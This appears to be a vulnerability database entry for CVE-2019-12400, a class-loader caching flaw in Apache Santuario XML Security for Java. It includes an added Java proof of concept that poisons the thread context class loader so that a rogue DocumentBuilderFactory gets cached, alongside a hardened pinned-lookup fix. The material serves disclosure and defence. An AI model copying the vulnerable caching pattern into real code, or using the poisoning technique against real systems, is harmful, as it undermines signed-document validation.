CVE-2019-12400

CVSS v3.1 5.5 (Medium)
CVSS v2.0 1.9 (Low)
EPSS 0.20% (57th percentile)
Affected Products 3
Advisories 1

In version 2.0.3 of Apache Santuario XML Security for Java, a caching mechanism was introduced to speed up the creation of new XML documents, using a static pool of DocumentBuilders. However, if untrusted code can first register a malicious implementation with the thread context class loader, that implementation may be cached and re-used by Apache Santuario XML Security for Java, leading to potential security flaws, for example when validating signed documents. The practical consequence of the static pool is that the JAXP lookup behind DocumentBuilderFactory.newInstance(), which consults the thread context class loader, is performed once and its result is then served to every later caller regardless of which thread or class loader they run under. The vulnerability affects Apache Santuario XML Security for Java 2.0.x releases from 2.0.3 onwards and all 2.1.x releases before 2.1.4; upgrade to 2.1.4 or later (no fixed 2.0.x release is listed here).
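The following is an added example, not code from Apache Santuario or from this advisory, that shows the mechanism described above in isolation: a class loader installed as the thread context class loader answers the JAXP ServiceLoader lookup with its own DocumentBuilderFactory, a static cache populated while that loader is active keeps serving the attacker's class after the loader is restored, and an explicitly pinned lookup is unaffected. The class names TcclPoisonDemo, EvilFactory and PoisonedLoader are hypothetical; the pinned implementation name assumes a standard OpenJDK/Oracle JDK with the bundled Xerces parser.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.nio.charset.StandardCharsets;
import java.util.Collections;
import java.util.Enumeration;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

public class TcclPoisonDemo {

    // JDK-bundled Xerces factory; assumption: a standard OpenJDK/Oracle JDK.
    static final String XERCES_IMPL =
        "com.sun.org.apache.xerces.internal.jaxp.DocumentBuilderFactoryImpl";

    // Hypothetical stand-in for an attacker-supplied implementation. It delegates to
    // the real parser so the demo keeps running; a hostile one could hand back a
    // DocumentBuilder that alters what is later canonicalised, signed or verified.
    public static class EvilFactory extends DocumentBuilderFactory {
        public DocumentBuilder newDocumentBuilder() throws ParserConfigurationException {
            return pinnedFactory().newDocumentBuilder();
        }
        public void setAttribute(String n, Object v) {}
        public Object getAttribute(String n) { return null; }
        public void setFeature(String n, boolean v) {}
        public boolean getFeature(String n) { return false; }
    }

    // Class loader that "registers" EvilFactory by answering the ServiceLoader resource
    // lookup for META-INF/services/javax.xml.parsers.DocumentBuilderFactory with an
    // in-memory file. All real class loading is delegated to the parent loader.
    static class PoisonedLoader extends ClassLoader {
        static final String SERVICE = "META-INF/services/javax.xml.parsers.DocumentBuilderFactory";
        PoisonedLoader(ClassLoader parent) { super(parent); }

        @Override
        public Enumeration<URL> getResources(String name) throws IOException {
            if (!SERVICE.equals(name)) return super.getResources(name);
            byte[] body = (EvilFactory.class.getName() + "\n").getBytes(StandardCharsets.UTF_8);
            URL u = new URL("memory", null, 0, SERVICE, new URLStreamHandler() {
                @Override protected URLConnection openConnection(URL url) {
                    return new URLConnection(url) {
                        @Override public void connect() {}
                        @Override public InputStream getInputStream() { return new ByteArrayInputStream(body); }
                    };
                }
            });
            return Collections.enumeration(Collections.singletonList(u));
        }
    }

    // Vulnerable shape, modelled on the description above (not Santuario's code):
    // whatever the TCCL resolves on first use is frozen into a static cache and
    // handed to every later caller, even after the TCCL has been restored.
    private static DocumentBuilderFactory cached;

    static synchronized DocumentBuilderFactory cachedFactory() {
        if (cached == null) cached = DocumentBuilderFactory.newInstance();
        return cached;
    }

    // Hardened shape: name the implementation and the loader explicitly, so the thread
    // context class loader has no say in which class is instantiated. On Java 9+,
    // DocumentBuilderFactory.newDefaultInstance() is the equivalent for the JDK parser.
    static DocumentBuilderFactory pinnedFactory() {
        return DocumentBuilderFactory.newInstance(XERCES_IMPL, TcclPoisonDemo.class.getClassLoader());
    }

    public static void main(String[] args) throws Exception {
        Thread t = Thread.currentThread();
        ClassLoader clean = t.getContextClassLoader();
        System.out.println("clean TCCL    -> " + DocumentBuilderFactory.newInstance().getClass().getName());

        t.setContextClassLoader(new PoisonedLoader(clean));
        try {
            System.out.println("poisoned TCCL -> " + DocumentBuilderFactory.newInstance().getClass().getName());
            cachedFactory();   // first use happens while the TCCL is poisoned
            System.out.println("pinned        -> " + pinnedFactory().getClass().getName());
        } finally {
            t.setContextClassLoader(clean);
        }
        // The cache outlives the poisoning: later callers still receive EvilFactory.
        System.out.println("cached, after restore -> " + cachedFactory().getClass().getName());
    }
}
```

Compile and run with `javac TcclPoisonDemo.java && java TcclPoisonDemo`. The first line names the JDK factory, the second and last name TcclPoisonDemo$EvilFactory, and the pinned lookup names the JDK factory even while the poisoned loader is installed. The demo relies on the documented JAXP lookup order (system property, jaxp.properties, then ServiceLoader via the thread context class loader, then the built-in default), so it will not show the substitution if the javax.xml.parsers.DocumentBuilderFactory system property is already set.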

Weaknesses
CWE-20
Improper Input Validation
CVE Status
PUBLISHED
CNA
Apache Software Foundation
Published Date
2019-08-23 21:15:11
Updated Date
2023-11-07 03:03:33

Affected Products


Configuration #1

  Product                                  CPE 2.3                                           From       Up to
  Apache Santuario XML Security for Java   cpe:2.3:a:apache:santuario_xml_security_for_java  >= 2.0.3   <= 2.0.10
  Apache Santuario XML Security for Java   cpe:2.3:a:apache:santuario_xml_security_for_java  >= 2.1.0   < 2.1.4

Configuration #2

  Product                                            CPE 2.3
  Red Hat JBoss Enterprise Application Platform 7.2  cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2

Configuration #3

  Product                            CPE 2.3
  Oracle WebLogic Server 12.2.1.4.0  cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0
  Oracle WebLogic Server 14.1.1.0.0  cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0